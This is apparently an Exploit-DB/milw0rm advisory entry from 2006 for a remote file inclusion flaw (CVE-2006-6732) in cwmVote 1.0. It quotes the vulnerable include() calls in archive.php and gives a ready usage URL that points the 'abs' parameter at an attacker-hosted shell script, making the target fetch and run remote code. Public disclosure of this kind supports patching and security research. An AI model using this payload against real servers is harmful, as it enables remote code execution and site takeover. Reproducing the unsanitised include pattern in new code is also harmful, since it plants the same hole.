cwmVote 1.0 archive.php Remote File Include Vulnerability

2006-12-19T00:00:00
ID EDB-ID:2958
Type exploitdb
Reporter bd0rk
Modified 2006-12-19T00:00:00

Description

cwmVote 1.0 (archive.php) Remote File Include Vulnerability. CVE-2006-6732. Webapps exploit for php platform

                                        
                                            ################################################################
#                                                              #
#            cwmVote 1.0 File Include Vulnerability            #
#                                                              #
# F0und3R: bd0rk || SOH-Crew                                   #
#                                                              #
# Website: www.soh-crew.it.tt                                  #
#                                                              #
# Download: http://explorer.cwm-design.de/dirs/41/cwmVote.rar  #
#                                                              #
################################################################

Vulnerable Code in archive.php


Code: include($abs."inc/functions.inc.php");
include($abs."inc/conf.mysql.inc.php");
include($abs."inc/conf.pw.inc.php");

Usage: http://[target]/[cwm_vote_path]/archive.php?abs=http://[Shellscript]

Greetings: TheJT, Lu7k, Kacper, nukedx, str0ke

# milw0rm.com [2006-12-19]